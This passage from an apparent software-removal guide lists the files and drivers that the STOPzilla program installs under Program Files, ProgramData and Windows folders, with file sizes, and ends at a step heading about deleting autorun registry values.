    %Program Files% (x86)\STOPzilla\Definitions\Staging\libMsCab.dll (6049 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\libRar.dll (5729 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiarkup.dll (6010 bytes)
    %Program Files% (x86)\STOPzilla\gfiark.dll (61 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\white0.std (15 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\libMsi.dll (673 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\cblk.vtd (1236324 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\networkrules.dat (4 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\fsigs.vdx (192 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiutl64.sys (310 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\DefVer.txt (260 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\libtd.dll (673 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\bhsl.vtd (22430 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\libtd.dll (2377 bytes)
    %Program Files% (x86)\STOPzilla\gfiark32.sys (43 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\adsrules.dat (14250 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\SBTS.dat (3280 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\libEmail.dll (1425 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\SBTS.dat (328 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\macroptn.std (673 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\macroptn.std (7306 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\smim0.std (50 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\CatDesc.vdx (673 bytes)
    C:\ProgramData\STOPzilla!\ServiceConfig.xml (10 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\hcol.wtd (226 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\lgpl.dll (7345 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\apincl.dat (7140 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\libCHM.dll (1873 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\sdll0.std (223360 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\updater.dll (3665 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\ThreatDT.vdx (392 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\smim0.std (5 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\elf_hash.dat (528 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\IncompatiblePrograms.dll (6010 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\api0.std (3073 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\ip.vtd (824 bytes)
    %Program Files% (x86)\STOPzilla\SBTE.dll (49 bytes)
    C:\ProgramData\STOPzilla!\History\20150425042029.xml (38 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\libNSIS.dll (12810 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\api0.std (524 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\DefVer.txt (26 bytes)
    C:\ProgramData\STOPzilla!\FirewallConfig.xml (1434 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\heur0.std (20 bytes)
    %Program Files% (x86)\STOPzilla\mimepp.dll (212 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\remediation.dll (7961 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\libRTF.dll (6730 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\incompats.dat (1 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\updater.dll (849 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\libBase64.dll (7025 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\dnrl.vdx (1513 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\AdviceTx.vdx (10 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\ThreatCategoryGlossary.xsd (1 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\TImem.vdx (3 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\sdll0.std (64896 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\libVvs.dll (12217 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\networkrules.dat (40 bytes)
    C:\ProgramData\STOPzilla!\RegistrationConfig.xml (2408 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\whsl.wtd (41850 bytes)
    C:\ProgramData\STOPzilla!\ThreatDefinitionsConfig.xml (2236 bytes)
    %Program Files% (x86)\STOPzilla\gfiutl64.sys (63 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\dex_hash.dat (132706 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\RegDT.vdx (36934 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\FastSigs.vdx (1425 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\RTmem.vdx (3 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\unpck0.std (55 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\gfiarkup.dll (2537 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\FolderDT.vdx (1953 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\libZip.dll (1281 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\gfiutl32.sys (24 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\dnrl.vdx (1281 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\CoreVer.txt (30 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\dex_hash.dat (378000 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\libZip.dll (3441 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\ThreatCategoryGlossary.xsd (1 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\CatDesc.vdx (6730 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\FileDT.vdx (673 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\qscnf.vdx (541 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\VVSSigs.vdx (360 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\ih.vdx (11863 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\CoreVer.txt (3 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\bhmem.vtd (484 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Cookies.vdx (1281 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\dnrl.vdx (12810 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\gfiutil.dll (14 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\AdviceTx.vdx (10 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\CatID.vdx (9 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\libOleA.dll (21050 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\ThreatDT.vdx (545890 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\libOleA.dll (4497 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\ihmem.vtd (540 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\libMachoUniv.dll (2337 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\mime0.std (26 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\whsl.wtd (4185 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\remediation.dll (2449 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\libOleA.dll (2105 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\kbu.dat (84216 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\heur0.std (2 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\patchw32.dll (3226 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\qscnr.vdx (8 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\libCHM.dll (6730 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\networkrules.dat (4 bytes)
    C:\Windows\System32\drivers\gfiark.sys (86 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\WebFilterExceptions.dat (1840 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\EPSigs.vdx (65 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\hstn.vtd (1369 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\libZip.dll (12810 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\hstn.vtd (6010 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\hstn.vtd (601 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\incompats.dat (10 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\libMachoUniv.dll (673 bytes)
    C:\ProgramData\STOPzilla!\SoftwareUpdateConfig.xml (1244 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\gfiark64.sys (41 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\adsrules.dat (281 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\cmem.vtd (692 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\gfiutl32.sys (24 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\mime0.std (26 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\EPSigs.vdx (650 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\kbu.dll (62 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\ip.vtd (8240 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\remediation.dll (21050 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\comp0.std (43 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\SBTS.dat (328 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\pack0.std (14 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\IncompatiblePrograms.dll (2281 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\whsl.wtd (5041 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\libNSIS.dll (1281 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\CatID.vdx (90 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\acertdefs0.std (4770 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\idsrules.dat (673 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\WebFilterExceptions.dat (184 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\gfiark.dll (955 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\script0.std (673 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\FileDT.vdx (3227 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\patchw32.dll (12810 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\lgpl.dll (13065 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\bhsl.vtd (224300 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\HistoryCleaner.xml (673 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\smim0.std (5 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\RegDT.vdx (74330 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\cname.wtd (6010 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\JSSigs.vdx (8281 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\libEmail.dll (14250 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\lib7zip.dll (4425 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\VVSSigs.vdx (36 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\gfiark.dll (29 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\FastSigs.vdx (14250 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\libVvs.dll (2105 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\qscnf.vdx (541 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\RegDT.vdx (7433 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\libEmail.dll (6505 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\pack0.std (14 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\RTA84430 (5516 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\kbu.dat (86490 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\SBBIN.RTP (405 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\bmem.vtd (708 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\FolderDT.vdx (6010 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\libBase64.dll (673 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\apprules.dat (10 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\lgpl.dll (73450 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\hcol.wtd (50 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\dnrlmem.vtd (554 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\cname.wtd (905 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\dexmem.vtd (348 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\gfiutl64.sys (31 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\sel.dat (6 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\qscnf.vdx (5410 bytes)
    %Program Files% (x86)\STOPzilla\SBAMConfig.bin (20 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\ctid.vtd (2001852 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\JSSigs.vdx (1 bytes)
    C:\ProgramData\STOPzilla!\HIPSConfig.xml (3056 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiutl32.sys (240 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\DefVer.txt (260 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\qscnr.vdx (8 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\libMsCab.dll (2321 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\WebFilterExceptions.dat (184 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\patchw32.dll (1514 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\white.wtd (3903230 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\defs0.std (50348 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\vcore.dll (395060 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\vcore.dll (40233 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\VVSSigs.vdx (36 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\libRar.dll (14250 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiark64.sys (410 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\ih.vdx (14250 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\script0.std (6730 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\ThreatCategoryGlossary.xml (470 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\JSSigs.vdx (82810 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\gfiark32.sys (823 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\libMsCab.dll (23210 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\idsrules.dat (6730 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\FileDT.vdx (6730 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\comp0.std (430 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\IncompatiblePrograms.dll (601 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\dex_hash.dat (1327060 bytes)
    %Program Files% (x86)\STOPzilla\gfiark64.sys (86 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\libRTF.dll (1761 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\Cookies.vdx (12810 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\updater.dll (6730 bytes)
    C:\ProgramData\STOPzilla!\APConfig.xml (592 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\acertdefs0.std (477 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\RootCA.wtd (340 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\rem0.std (9605 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\pack0.std (140 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\libMsi.dll (6730 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\white.wtd (492846 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\gfiutl64.sys (31 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\hcol.wtd (500 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\kbu.dll (450 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\idsrules.dat (136 bytes)
    C:\ProgramData\STOPzilla!\HttpServerConfig.xml (624 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\gfiarkup.dll (601 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\libRTF.dll (673 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\libVvs.dll (21050 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\RootCA.wtd (34 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\ThreatCategoryGlossary.xml (47 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\RootCA.wtd (34 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\apincl.dat (714 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\ThreatID.vdx (8632 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\white0.std (150 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\ckmem.vdx (412 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\defs0.std (852280 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\HistoryCleaner.xml (6730 bytes)
    %Program Files% (x86)\STOPzilla\SbHips.dll (90 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\kbu.dll (620 bytes)
    C:\ProgramData\STOPzilla!\CountScans.XML (338 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\AdviceTx.vdx (100 bytes)
    %Program Files% (x86)\STOPzilla\gfiutil.dll (30 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\ThreatCategoryGlossary.xml (47 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\fsigs.vdx (192 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\apprules.dat (1 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\rem0.std (57449 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\sel.dat (6 bytes)
    C:\ProgramData\STOPzilla!\Logs\SBAMThreatEngineLog.csv (1134046 bytes)
    C:\Windows\System32\drivers\gfiutil.sys (63 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\cblk.vtd (998680 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\comp0.std (43 bytes)
    %Program Files% (x86)\STOPzilla\kbu.dll (127 bytes)
    %Program Files% (x86)\STOPzilla\FSSC.dat (12 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\CatID.vdx (9 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\kbu.dat (842160 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\libMachoUniv.dll (6730 bytes)
    C:\ProgramData\STOPzilla!\WSCConfig.xml (1330 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\gfiutil.dll (14 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\libtd.dll (6730 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\lib7zip.dll (6730 bytes)
    C:\ProgramData\STOPzilla!\Events\EV2015042504171201.xml (370 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\gfiark64.sys (41 bytes)
    C:\ProgramData\STOPzilla!\Events\EV2015042504202902.xml (370 bytes)
    %Program Files% (x86)\STOPzilla\gfiutl32.sys (24 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\heur0.std (2 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiutil.dll (140 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\sdll0.std (22336 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiark.dll (290 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\libRar.dll (1425 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\lib7zip.dll (673 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\gfiark32.sys (43 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\ThreatCategoryGlossary.xsd (10 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\ThreatID.vdx (8281 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\ip.vtd (824 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\ThreatDT.vdx (54589 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\bhsl.vtd (40124 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiark32.sys (430 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\api0.std (30730 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\unpck0.std (55 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\libCHM.dll (673 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\sel.dat (60 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\defs0.std (85228 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\script0.std (5374 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\ctid.vtd (3413080 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\vcore.dll (76554 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\macroptn.std (6730 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\rem0.std (96050 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\apincl.dat (714 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\apprules.dat (1 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\libMsi.dll (3761 bytes)
    C:\ProgramData\STOPzilla!\EmailAVConfig.xml (205 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\incompats.dat (1 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\CatDesc.vdx (180 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\white0.std (15 bytes)
    C:\ProgramData\STOPzilla!\ScanConfig.xml (2932 bytes)
    %Program Files% (x86)\STOPzilla\SBTIS.dll (114 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\white.wtd (390323 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\acertdefs0.std (477 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\Cookies.vdx (3097 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\CoreVer.txt (30 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\cblk.vtd (9985728 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\fsigs.vdx (1920 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\adsrules.dat (1425 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\unpck0.std (550 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\FolderDT.vdx (601 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\libBase64.dll (6730 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\ThreatID.vdx (82810 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\FastSigs.vdx (280 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\HistoryCleaner.xml (5951 bytes)
    C:\ProgramData\STOPzilla!\Logs\SBAMSvcLog.csv (1383028 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\ctid.vtd (341308 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\cname.wtd (601 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\Staging\elf_hash.dat (528 bytes)
    %Program Files% (x86)\STOPzilla\Definitions\LKGD\qscnr.vdx (80 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TarF5E3.tmp (2712 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A4B782275DC1682E4DC39E697A49B151 (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 (656 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CabF5E2.tmp (48 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\STOPzilla7.msi (1643823 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A4B782275DC1682E4DC39E697A49B151 (412 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl (712 bytes)
    %Program Files% (x86)\STOPzilla\SBSetupDrivers.exe (180 bytes)
    C:\Windows\System32\DriverStore\Temp\{4f69f560-3dc5-07a7-53cf-bd6e4eaaf72f}\SETDC0D.tmp (3 bytes)
    C:\Windows\System32\DriverStore\Temp\{4f69f560-3dc5-07a7-53cf-bd6e4eaaf72f}\SETDBFC.tmp (8 bytes)
    C:\Windows\System32\DriverStore\INFCACHE.0 (1861 bytes)
    C:\Windows\System32\DriverStore\infstor.dat (940 bytes)
    C:\Windows\inf\oem13.inf (3 bytes)
    C:\Windows\System32\DriverStore\Temp\{4f69f560-3dc5-07a7-53cf-bd6e4eaaf72f}\amd64\wnet\SETDC0E.tmp (601 bytes)
    C:\Windows\System32\DriverStore\FileRepository\sbfwim.inf_amd64_neutral_09abe461a7fb864d\sbfwim.PNF (8464 bytes)
    C:\Windows\System32\DriverStore\Temp\{43a08643-c069-7a03-1bae-01365fc66a22}\SETDDE0.tmp (8 bytes)
    C:\Windows\inf\oem14.inf (1 bytes)
    C:\Windows\System32\DriverStore\Temp\{43a08643-c069-7a03-1bae-01365fc66a22}\SETDDF0.tmp (1 bytes)
    C:\Windows\System32\DriverStore\FileRepository\sbfwim_m.inf_amd64_neutral_9058dec7bb12b258\sbfwim_m.PNF (4811 bytes)
    C:\ProgramData\STOPzilla!\Logs\S-1-5-21-2858020935-2156992550-3658131804-1003.stopzilla7.log (24142 bytes)
    C:\ProgramData\STOPzilla!\sz7.data-journal (4518 bytes)
    C:\Windows\Temp\OLD168C.tmp (601 bytes)
    C:\Windows\System32\drivers\SET169B.tmp (691 bytes)
    %Program Files% (x86)\STOPzilla\x64\SBAMSvcPS.dll (69 bytes)
    %Program Files% (x86)\STOPzilla\x64\SBAMOutlook.dll (446 bytes)
    C:\Windows\Temp\cfc791fe-c515-4b74-a3d5-bd35083fed43 (223 bytes)
    C:\Windows\Temp\b547cdad-d8a5-4d61-95a2-f7616170c67e (223 bytes)
    C:\Windows\Temp\ae0b2b8c-b2b5-4e50-b7ff-769522044179 (223 bytes)
    C:\ProgramData\STOPzilla!\Logs\sz-net-assist.log (19768668 bytes)
    C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A4B782275DC1682E4DC39E697A49B151 (1 bytes)
    C:\Windows\Temp\fff275e4-419b-48fe-963a-c0011a05bfb9 (48733 bytes)
    C:\Windows\Temp\037d4f6a-0574-4316-b003-d803b0bc2577 (24945 bytes)
    C:\Windows\Temp\4c7c3001-c7cf-4f43-88e1-0f52a08e06a9 (223 bytes)
    C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A4B782275DC1682E4DC39E697A49B151 (412 bytes)
    C:\Windows\Temp\59db4a19-a509-4b93-b854-13678662fd8f (10071 bytes)
    C:\Windows\Temp\bbe27e88-1190-4118-a730-4f9519d6c74d (30169149 bytes)
    C:\Windows\Temp\7f53ae67-47b8-4bf2-aad3-054d5e7e2bf1 (223 bytes)
    C:\Windows\Temp\73901abc-e30f-42ed-898e-68cb9217849e (223 bytes)
    C:\ProgramData\STOPzilla!\Logs\sz7.log (78551 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_o4arGwZ2LOh436Q (80 bytes)
    C:\Windows\SysWOW64\msvcr120.dll (974 bytes)
    C:\ProgramData\STOPzilla!\Logs\sz7-msi.log (18618 bytes)
    %Program Files% (x86)\STOPzilla\GFI.Tools.Run64.exe (192 bytes)
    C:\Windows\SysWOW64\msvcp120.dll (458 bytes)
    C:\ProgramData\STOPzilla!\Logs\wsc.log (6794 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI16DA.tmp (159 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

